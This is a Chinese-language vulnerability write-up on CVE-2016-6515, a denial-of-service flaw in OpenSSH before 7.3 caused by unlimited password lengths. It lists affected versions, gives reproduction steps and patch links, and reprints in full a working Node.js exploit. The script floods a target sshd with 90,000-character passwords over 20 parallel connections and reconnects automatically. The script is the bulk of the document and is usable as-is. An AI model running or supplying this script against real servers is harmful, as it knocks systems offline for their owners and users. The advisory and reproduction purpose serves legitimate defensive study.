3.9.1 cve-2016-6515

漏洞名称

OpenSSH auth_password函数拒绝服务漏洞（cve-2016-6515）

漏洞等级

高危

漏洞描述：

Before 7.3 OpenSSH does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string. This bug resides in auth-passwd.c in auth_password function. Attackers can exploit this issue to cause the application to enter an infinite loop and consume excessive CPU resources, resulting in denial-of-service conditions. 大致意思： OpenSSH 7.3之前版本，sshd/auth-passwd.c/auth_password函数未限制密码验证中的密码长度，远程攻击者通过较长的字符串，利用此漏洞可造成拒绝服务。

漏洞影响：

• Ubuntu 16.04 LTS (If running 7.2)

• OpenSSH OpenSSH 7.2p2

• OpenSSH OpenSSH 7.2

• IBM Vios 2.2.1 4

• IBM Vios 2.2

• IBM Vios 2.2.4.0

• IBM Vios 2.2.3.50

• IBM Vios 2.2.2.5

• IBM Vios 2.2.2.0

• IBM Vios 2.2.1.3

• IBM Vios 2.2.1.1

• IBM Vios 2.2.0.13

• IBM Vios 2.2.0.11

• IBM OpenSSH for GPFS 3.5

• IBM Aix 7.2

• IBM AIX 7.1

• IBM AIX 6.1

• IBM AIX 5.3

• Openssh < 7.3

漏洞复现：

debian食用方法(不同环境依赖可能不同)：

zhzy@debian:~$  apt-get install
zhzy@debian:~$  npm install ssh2
zhzy@debian:~$  npm install commander
zhzy@debian:~$  ./exploit.js -h HOST -p PORT -u USER

左侧vm为测试对象，右侧terminal为攻击方，下图为执行前，vm中ubuntu的top信息。

执行后可以看到vm中ubuntu的cpu使用率急速提升。

下载链接：cve-2016-6515.zip

#!/usr/bin/env node

/*
 * CVE-2016-6515 exploit by opsxcq
 */

var Client = require('ssh2').Client;
var program = require('commander');

function usage(){
    console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}

var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
    buffer = buffer + pattern;
}

function exploit(host, port, user){
    var conn = new Client();
    conn//
    .on('end', function() {
        // Again
        exploit(host, port, user); 
    })//
    .on('close', function(err) {
        // Again
        if(!err){
            exploit(host, port, user); 
        }
    })//
    .on('error', function(){
        exploit(host, port, user); 
    }) //
    .connect({
        host: host,
        port: port,
        username: user,
        password: buffer
    });
}

program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);

if (!program.port){
    usage();
    return -1;
}

if (!program.user){
    usage();
    return -1;
}

if (!program.host){
    usage();
    return -1;
}

var instances = 20;
if(program.instances){
    instances = program.instances;
}

try{
    console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
    for(var i=0; i < instances; i++){
        exploit(program.host, program.port, program.user);
    }
}catch(e){
    console.log("[-] Exception: "+e);
}

修复建议：

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://openwall.com/lists/oss-security/2016/08/01/2 https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97 或将openssh升级到v7.3版本以上（查看openssh版本：ssh -V）